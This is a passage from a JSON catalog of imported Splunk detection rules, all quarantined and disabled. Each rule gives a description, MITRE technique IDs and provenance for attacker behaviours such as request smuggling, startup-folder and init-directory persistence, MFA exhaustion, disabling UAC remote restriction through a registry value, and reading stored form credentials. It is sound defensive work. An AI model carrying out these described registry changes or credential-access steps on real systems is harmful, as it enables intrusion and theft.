unauthorized information gathering and take steps to mitigate potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-systeminfo-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97937ece-cb13-4dbc-9684-c0dc3afd400a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_systeminfo_discovery.yml" } }, { "id": "splunk-security-content-97a8dc5f-8a7c-4fed-9e3e-ec407fd0268a", "type": "detection", "name": "Windows Computer Account Created by Computer Account", "description": "The following analytic identifies a computer account creating a new computer account with a specific Service Principal Name (SPN) \"RestrictedKrbHost\". This detection leverages Windows Security Event Logs, specifically EventCode 4741, to identify such activities. This behavior is significant as it may indicate an attempt to establish unauthorized Kerberos authentication channels, potentially leading to lateral movement or privilege escalation. If confirmed malicious, this activity could allow an attacker to impersonate services, access sensitive information, or maintain persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-computer-account-created-by-computer-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97a8dc5f-8a7c-4fed-9e3e-ec407fd0268a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_computer_account_created_by_computer_account.yml" } }, { "id": "splunk-security-content-97d85f98-9d15-41a0-8682-7030454875e7", "type": "detection", "name": "HTTP Possible Request Smuggling", "description": "HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users. This detection identifies a common request smuggling technique of using both Content-Length and Transfer-Encoding headers to cause a parsing confusion between the frontend and backend.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-possible-request-smuggling.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97d85f98-9d15-41a0-8682-7030454875e7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/http_possible_request_smuggling.yml" } }, { "id": "splunk-security-content-97d9cfb2-61ad-11ec-bb2d-acde48001122", "type": "detection", "name": "Linux File Creation In Init Boot Directory", "description": "The following analytic detects the creation of files in Linux init boot directories, which are used for automatic execution upon system startup.\nIt leverages file system logs to identify new files in directories such as /etc/init.d/ and /etc/rc.d/. This activity is significant as it is a common persistence technique used by adversaries, malware authors, and red teamers.\nIf confirmed malicious, this could allow an attacker to maintain persistence on the compromised host, potentially leading to further exploitation and unauthorized control over the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1037.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-file-creation-in-init-boot-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97d9cfb2-61ad-11ec-bb2d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_file_creation_in_init_boot_directory.yml" } }, { "id": "splunk-security-content-97e2fe57-3740-402c-988a-76b64ce04b8d", "type": "detection", "name": "Okta MFA Exhaustion Hunt", "description": "The following analytic detects patterns of successful and failed Okta MFA push attempts to identify potential MFA exhaustion attacks. It leverages Okta event logs, specifically focusing on push verification events, and uses statistical evaluations to determine suspicious activity. This activity is significant as it may indicate an attacker attempting to bypass MFA by overwhelming the user with push notifications. If confirmed malicious, this could lead to unauthorized access, compromising the security of the affected accounts and potentially the entire environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-mfa-exhaustion-hunt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97e2fe57-3740-402c-988a-76b64ce04b8d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_mfa_exhaustion_hunt.yml" } }, { "id": "splunk-security-content-97fc2b60-c8eb-4711-93f7-d26fade3686f", "type": "detection", "name": "Windows System Reboot CommandLine", "description": "The following analytic identifies the execution of the Windows command line to reboot a host machine using \"shutdown.exe\" with specific parameters. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as it is often associated with advanced persistent threats (APTs) and remote access trojans (RATs) like dcrat, which may use system reboots to disrupt operations, aid in system destruction, or inhibit recovery. If confirmed malicious, this could lead to system downtime, data loss, or hindered incident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-reboot-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97fc2b60-c8eb-4711-93f7-d26fade3686f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_reboot_commandline.yml" } }, { "id": "splunk-security-content-983be012-e408-4cb0-b87f-6756bb5f7047", "type": "detection", "name": "Cisco Duo Bulk Policy Deletion", "description": "The following analytic detects instances where a Duo administrator performs a bulk deletion of more than three policies in a single action. It identifies this behavior by searching Duo activity logs for the policy_bulk_delete action, extracting the names of deleted policies, and counting them. If the count exceeds three, the event is flagged. This behavior is significant for a Security Operations Center (SOC) because mass deletion of security policies can indicate malicious activity, such as an attacker or rogue administrator attempting to weaken or disable security controls, potentially paving the way for further compromise. Detecting and investigating such actions promptly is critical, as the impact of this attack could include reduced security posture, increased risk of unauthorized access, and potential data breaches. Monitoring for bulk policy deletions helps ensure that any suspicious or unauthorized changes to security configurations are quickly identified and addressed to protect organizational assets and maintain compliance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-bulk-policy-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "983be012-e408-4cb0-b87f-6756bb5f7047", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_bulk_policy_deletion.yml" } }, { "id": "splunk-security-content-985f322c-57a5-11ec-b9ac-acde48001122", "type": "detection", "name": "MS Exchange Mailbox Replication service writing Active Server Pages", "description": "The following analytic identifies the creation of suspicious .aspx files in specific directories associated with Exchange exploitation by the HAFNIUM group and the ProxyShell vulnerability. It detects this activity by monitoring the MSExchangeMailboxReplication.exe process, which typically does not write .aspx files. This behavior is significant as it may indicate an active exploitation attempt on Exchange servers. If confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, or maintain persistence within the environment. Immediate investigation and remediation are crucial to prevent further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ms-exchange-mailbox-replication-service-writing-active-server-pages.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "985f322c-57a5-11ec-b9ac-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ms_exchange_mailbox_replication_service_writing_active_server_pages.yml" } }, { "id": "splunk-security-content-986565a2-7707-48ea-9590-37929cebc938", "type": "detection", "name": "ASL AWS Defense Evasion PutBucketLifecycle", "description": "The following analytic detects `PutBucketLifecycle` events in AWS CloudTrail logs where a user sets a lifecycle rule for an S3 bucket with an expiration period of fewer than three days. This detection leverages CloudTrail logs to identify suspicious lifecycle configurations. This activity is significant because attackers may use it to delete CloudTrail logs quickly, thereby evading detection and impairing forensic investigations. If confirmed malicious, this could allow attackers to cover their tracks, making it difficult to trace their actions and respond to the breach effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485.001", "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-putbucketlifecycle.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "986565a2-7707-48ea-9590-37929cebc938", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_putbucketlifecycle.yml" } }, { "id": "splunk-security-content-989019b4-b7aa-418a-9a17-2293e91288b6", "type": "detection", "name": "Windows Modify Registry DisableSecuritySettings", "description": "The following analytic detects modifications to the Windows registry that disable security settings for Terminal Services. It leverages the Endpoint data model, specifically monitoring changes to the registry path associated with Terminal Services security settings. This activity is significant because altering these settings can weaken the security posture of Remote Desktop Services, potentially allowing unauthorized remote access. If confirmed malicious, such modifications could enable attackers to gain persistent remote access to the system, facilitating further exploitation and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disablesecuritysettings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "989019b4-b7aa-418a-9a17-2293e91288b6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disablesecuritysettings.yml" } }, { "id": "splunk-security-content-98e6b389-2806-4426-a580-8a92cb0d9710", "type": "detection", "name": "Microsoft Intune Mobile Apps", "description": "Microsoft Intune supports deploying packaged applications to support software deployment, this functionality can also be abused for deploying malicious payloads to intune managed devices.\nThis detection identifies when a new packaged application has been added, updated or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072", "T1021.007", "T1202", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-intune-mobile-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "98e6b389-2806-4426-a580-8a92cb0d9710", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/microsoft_intune_mobile_apps.yml" } }, { "id": "splunk-security-content-98f22d82-9d62-11eb-9fcf-acde48001122", "type": "detection", "name": "Windows Multiple Disabled Users Failed To Authenticate Wth Kerberos", "description": "The following analytic detects a single source endpoint failing to authenticate with 30 unique disabled domain users using the Kerberos protocol within 5 minutes. It leverages Windows Security Event 4768, focusing on failure code `0x12`, indicating revoked credentials. This activity is significant as it may indicate a Password Spraying attack targeting disabled accounts, a tactic used by adversaries to gain initial access or elevate privileges. If confirmed malicious, this could lead to unauthorized access or privilege escalation within the Active Directory environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-disabled-users-failed-to-authenticate-wth-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "98f22d82-9d62-11eb-9fcf-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_disabled_users_failed_to_authenticate_wth_kerberos.yml" } }, { "id": "splunk-security-content-98f6ad4f-4325-4096-9d69-45dc8e638e82", "type": "detection", "name": "Okta Successful Single Factor Authentication", "description": "The following analytic identifies successful single-factor authentication events against the Okta Dashboard for accounts without Multi-Factor Authentication (MFA) enabled. It detects this activity by analyzing Okta logs for successful authentication events where \"Okta Verify\" is not used. This behavior is significant as it may indicate a misconfiguration, policy violation, or potential account takeover. If confirmed malicious, an attacker could gain unauthorized access to the account, potentially leading to data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-successful-single-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "98f6ad4f-4325-4096-9d69-45dc8e638e82", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_successful_single_factor_authentication.yml" } }, { "id": "splunk-security-content-991eb510-0fc6-11ec-82d3-acde48001122", "type": "detection", "name": "SchCache Change By App Connect And Create ADSI Object", "description": "The following analytic detects an application attempting to connect and create an ADSI object to perform an LDAP query. It leverages Sysmon EventCode 11 to identify changes in the Active Directory Schema cache files located in %LOCALAPPDATA%\\Microsoft\\Windows\\SchCache or %systemroot%\\SchCache. This activity is significant as it can indicate the presence of suspicious applications, such as ransomware, using ADSI object APIs for LDAP queries. If confirmed malicious, this behavior could allow attackers to gather sensitive directory information, potentially leading to further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schcache-change-by-app-connect-and-create-adsi-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "991eb510-0fc6-11ec-82d3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schcache_change_by_app_connect_and_create_adsi_object.yml" } }, { "id": "splunk-security-content-9928b732-210e-11ec-b65e-acde48001122", "type": "detection", "name": "Disable UAC Remote Restriction", "description": "The following analytic detects the modification of the registry to disable UAC remote restriction by setting the \"LocalAccountTokenFilterPolicy\" value to \"0x00000001\". It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\CurrentVersion\\\\Policies\\\\System*\". This activity is significant because disabling UAC remote restriction can allow an attacker to bypass User Account Control (UAC) protections, potentially leading to privilege escalation. If confirmed malicious, this could enable an attacker to execute unauthorized actions with elevated privileges, compromising the security of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-uac-remote-restriction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9928b732-210e-11ec-b65e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_uac_remote_restriction.yml" } }, { "id": "splunk-security-content-993ce99d-9cdd-42c7-a2cf-733d5954e5a6", "type": "detection", "name": "Windows System File on Disk", "description": "The following analytic detects the creation of new .sys files on disk. It leverages the Endpoint.Filesystem data model to identify and log instances where .sys files are written to the filesystem. This activity is significant because .sys files are often used as kernel mode drivers, and their unauthorized creation can indicate malicious activity such as rootkit installation. If confirmed malicious, this could allow an attacker to gain kernel-level access, leading to full system compromise, persistent control, and the ability to bypass security mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-file-on-disk.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "993ce99d-9cdd-42c7-a2cf-733d5954e5a6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_file_on_disk.yml" } }, { "id": "splunk-security-content-99495452-b899-11eb-96dc-acde48001122", "type": "detection", "name": "Enable RDP In Other Port Number", "description": "The following analytic detects modifications to the registry that enable RDP on a machine using a non-default port number. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" and the \"PortNumber\" value. This activity is significant as attackers often modify RDP settings to facilitate lateral movement and maintain remote access to compromised systems. If confirmed malicious, this could allow attackers to bypass network defenses, gain persistent access, and potentially control the compromised machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/enable-rdp-in-other-port-number.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "99495452-b899-11eb-96dc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/enable_rdp_in_other_port_number.yml" } }, { "id": "splunk-security-content-99abf2e1-863c-4ec6-82f8-714391590a4c", "type": "detection", "name": "GitHub Enterprise Modify Audit Log Event Stream", "description": "The following analytic detects when a user modifies or disables audit log event streaming in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for configuration changes that affect the audit log streaming functionality, which is used to send audit events to security monitoring platforms. This behavior could indicate an attacker attempting to prevent their malicious activities from being logged and detected by tampering with the audit trail. For a SOC, identifying modifications to audit logging is critical as it may be a precursor to other attacks where adversaries want to operate undetected. The impact could be severe as organizations lose visibility into user actions, configuration changes, and security events within their GitHub Enterprise environment, potentially allowing attackers to perform malicious activities without detection. This creates a significant blind spot in security monitoring and incident response capabilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-modify-audit-log-event-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "99abf2e1-863c-4ec6-82f8-714391590a4c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_modify_audit_log_event_stream.yml" } }, { "id": "splunk-security-content-99d157cb-923f-4a00-aee9-1f385412146f", "type": "detection", "name": "Windows Boot or Logon Autostart Execution In Startup Folder", "description": "The following analytic detects the creation of files in the Windows %startup% folder, a common persistence technique. It leverages the Endpoint.Filesystem data model to identify file creation events in this specific directory. This activity is significant because adversaries often use the startup folder to ensure their malicious code executes automatically upon system boot or user logon. If confirmed malicious, this could allow attackers to maintain persistence on the host, potentially leading to further system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-boot-or-logon-autostart-execution-in-startup-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "99d157cb-923f-4a00-aee9-1f385412146f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_boot_or_logon_autostart_execution_in_startup_folder.yml" } }, { "id": "splunk-security-content-99d69078-7dae-4ffe-9f3d-063242772f5a", "type": "detection", "name": "Windows Unusual Intelliform Storage Registry Access", "description": "The following analytic identifies processes accessing Intelliform Storage Registry keys used by Internet Explorer. It leverages Windows Security Event logs, specifically monitoring EventCode 4663, which tracks object access events. This activity is significant because it can indicate unauthorized access or manipulation of sensitive registry keys used for storing form data in Internet Explorer. If confirmed malicious, this could lead to data exfiltration, credential theft, or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-intelliform-storage-registry-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "99d69078-7dae-4ffe-9f3d-063242772f5a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_intelliform_storage_registry_access.yml" } }, { "id": "splunk-security-content-9a18f7c2-1fe3-47b8-9467-8b3976770a30", "type": "detection", "name": "Windows MSIExec Spawn WinDBG", "description": "The following analytic identifies the unusual behavior of MSIExec spawning WinDBG. It detects this activity by analyzing endpoint telemetry data, specifically looking for instances where 'msiexec.exe' is the parent process of 'windbg.exe'. This behavior is significant as it may indicate an attempt to debug or tamper with system processes, which is uncommon in typical user activity and could signify malicious intent. If confirmed malicious, this activity could allow an attacker to manipulate or inspect running processes, potentially leading to privilege escalation or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-spawn-windbg.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a18f7c2-1fe3-47b8-9467-8b3976770a30", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_spawn_windbg.yml" } }, { "id": "splunk-security-content-9a3e57e7-33f4-470e-b25d-165baa6e8357", "type": "detection", "name": "Windows Computer Account With SPN", "description": "The following analytic detects the addition of Service Principal Names (SPNs) HOST and RestrictedKrbHost to a computer account, indicative of KrbRelayUp behavior. This detection leverages Windows Security Event Logs, specifically EventCode 4741, to identify changes in SPNs. This activity is significant as it is commonly associated with Kerberos-based attacks, which can be used to escalate privileges or perform lateral movement within a network. If confirmed malicious, this behavior could allow an attacker to impersonate services, potentially leading to unauthorized access to sensitive resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-computer-account-with-spn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a3e57e7-33f4-470e-b25d-165baa6e8357", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_computer_account_with_spn.yml" } }, { "id": "splunk-security-content-9a4e50c7-5b62-4d52-93b4-f2b61332e9a5", "type": "detection", "name": "Advanced IP or Port Scanner Execution", "description": "The following analytic detects the execution of network scanning utilities such as Advanced IP Scanner or Advanced Port Scanner.\nThese legitimate administrative tools are often leveraged by threat actors and ransomware operators during the discovery phase to enumerate active hosts and open ports within a target environment.\nDetection is based on process creation telemetry referencing known executable names, original file names, or specific command-line parameters such as \"/portable\" and \"/lng\" that are characteristic of these tools.\nIf confirmed malicious, this activity may indicate internal reconnaissance aimed at identifying reachable systems or services prior to lateral movement or further post-compromise actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046", "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/advanced-ip-or-port-scanner-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a4e50c7-5b62-4d52-93b4-f2b61332e9a5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/advanced_ip_or_port_scanner_execution.yml" } }, { "id": "splunk-security-content-9a5a41d6-04e7-11ec-923c-acde48001122", "type": "detection", "name": "Get DomainUser with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments used to enumerate domain users via the `Get-DomainUser` command. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions mapped to the `Processes` node of the `Endpoint` data model. This activity is significant as it indicates potential reconnaissance efforts by adversaries or Red Teams using PowerView for Active Directory discovery. If confirmed malicious, this could allow attackers to gain situational awareness and identify valuable targets within the domain, potentially leading to further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domainuser-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a5a41d6-04e7-11ec-923c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domainuser_with_powershell.yml" } }, { "id": "splunk-security-content-9a5f4b3e-1d2b-4c6f-9a8e-3b7d2f5c1a6e", "type": "detection", "name": "Windows PsTools Recon Usage", "description": "The following analytic identifies execution of Sysinternals PsTools and Sysinternals Suit binaries that are commonly used for reconnaissance and information gathering on\nWindows endpoints.\nPsTools (PsExec, PsFile, PsGetSid, PsInfo, PsPing, 